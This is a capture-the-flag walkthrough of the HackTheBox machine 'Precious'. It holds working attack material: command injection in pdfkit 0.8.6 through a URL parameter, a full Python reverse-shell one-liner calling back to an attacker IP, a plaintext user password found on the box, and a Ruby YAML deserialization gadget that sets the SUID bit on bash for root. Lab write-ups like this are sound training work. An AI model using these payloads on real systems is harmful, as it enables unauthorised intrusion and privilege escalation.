Post

Precious

Posted Updated
https://www.hackthebox.com/achievement/machine/595651/513
https://www.hackthebox.com/achievement/machine/595651/513
By Shivendra Prajapati 1 min read
1
2
3
4

 IP : 10.10.11.189

sudo nano /etc/hosts
10.10.11.189    precious.htb

PORT SCAN RESULTS ➡️

Untitled

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(kali㉿kali)-[~/Downloads/HTB/Precious]
└─$ **sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.10.11.189**
Starting Nmap 7.93 ( https:/nmap.org ) at 2023-04-15 12:14 IST
Nmap scan report for 10.10.11.189
Host is up (0.17s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http:/precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: ; CPE: cpe:/o:linux:linux_kernel

Web Enumeartion ➡️

Untitled

Now on Burpsuite I got the pdf Generation version and Name »

Untitled

Since it is using pdfkit v0.8.6 to generate pdfs So I dig into it and I found that this version is vulnerable >

Untitled

It leads us to Link : Exploit

After reading the POC I got to known that we can use any get parameter name and inside that use the backticks to injection our command.

1

http:/<LOCAL-IP>:<LOCAL-PORT>/?name=%20 `id(command)`

Now lets try it out now ➡️

Untitled

And it generated the pdf with results »

Untitled

So lets try for reverse shell now ⤵️

1

http:/10.10.14.33:8888/?name=%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

Untitled

I got this »

Untitled

Now lets Login into henry ⤵️

1

henry : **Q3c1AqGHtoI0aXAYFH**

Untitled

Untitled

Now lets see how to get to root »

Untitled

Now let’s see what is inside this update_dependencies.rb file »

Untitled

It is loading this dependencies.yml file »

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

bash-5.1$ cat dependencies.yml]
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
bash-5.1$

Now I know that the /bin/bash permissions are changed so lets exploit it »

Untitled

Untitled

Lets see the flag now ⤵️

Untitled

If you have any questions or suggestions, please leave a comment below. Thank You !

HackTheBox
PrivEsc Public Exploit
This post is licensed under CC BY 4.0 by the author.